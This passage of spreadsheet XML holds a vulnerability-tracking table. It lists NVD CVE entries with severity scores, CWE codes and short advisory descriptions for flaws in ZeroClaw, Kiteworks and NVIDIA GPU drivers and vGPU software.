        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>ZeroClaw versions before 0.8.5 built with plugins-wasm feature contain a path traversal vulnerability in plugin installation that fails to validate the wasm_path manifest field. Attackers can convince users to install crafted plugins that write arbitrary files to paths outside the plugins directory, such as shell startup files, enabling code execution.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101885</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102112</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Kiteworks could allow an attacker who has already obtained code execution as an unprivileged backend service account on the appliance to escalate to root and run arbitrary commands with the highest privileges. Exploitation requires existing local access to that service account.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102112</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102113</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Kiteworks could allow an attacker who has already obtained code execution as an unprivileged backend service account on the appliance to escalate to root. A privileged routine did not safely handle a filesystem path that the lower-privileged account could influence, allowing the attacker to cause a root-owned operation to run arbitrary commands with the highest privileges. Exploitation requires existing local access to that service account.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102113</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102118</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-250, CWE-59</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability in Kiteworks could have allowed an attacker with an existing shell under a low-privileged service account to escalate to root privileges on the appliance.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102118</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47489</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where permissions on read-only memory might not be preserved. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47489</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47491</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-404</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user can cause improper release of memory resources, leaving a mapping accessible after the underlying memory is reused. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47491</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47493</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU software for Windows and Linux contains a vulnerability in the GPU kernel driver where a guest may access privileged host GPU resources for which it is not authorized. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47493</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47494</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability where a user might be able to cause a format string issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47494</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47495</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager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143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47495</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47497</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Virtual GPU Manager contains a vulnerability in the GPU System Processor (GSP) tracing component where a guest VM user may cause improper access by sending crafted data through a shared buffer. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47497</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47498</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Manager contains a vulnerability in the GPU System Processor (GSP) plugin where a guest VM user may cause an out-of-bounds write by sending a specially crafted RPC message. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47498</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47499</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Windows and Linux contains a vulnerability in the kernel mode layer where a guest could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47499</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47500</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where improper cleanup of reference counts during error paths could lead to a use-after-free condition. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47500</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47501</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause an out-of-bounds write by supplying mismatched memory buffers during event buffer setup. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47501</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47502</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Windows and Linux contains a vulnerability in the kernel mode layer, where a guest user could cause an integer overflow leading to memory corruption. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47502</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47503</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest VM user may cause an out-of-bounds write by sending a crafted RPC message with invalid performance state list size parameters. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47503</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47504</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Linux GPU Display Driver contains a vulnerability in the NGX updater where an outdated embedded cryptographic library is susceptible to type confusion. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, or data tampering.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47504</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47505</t>
        </is>
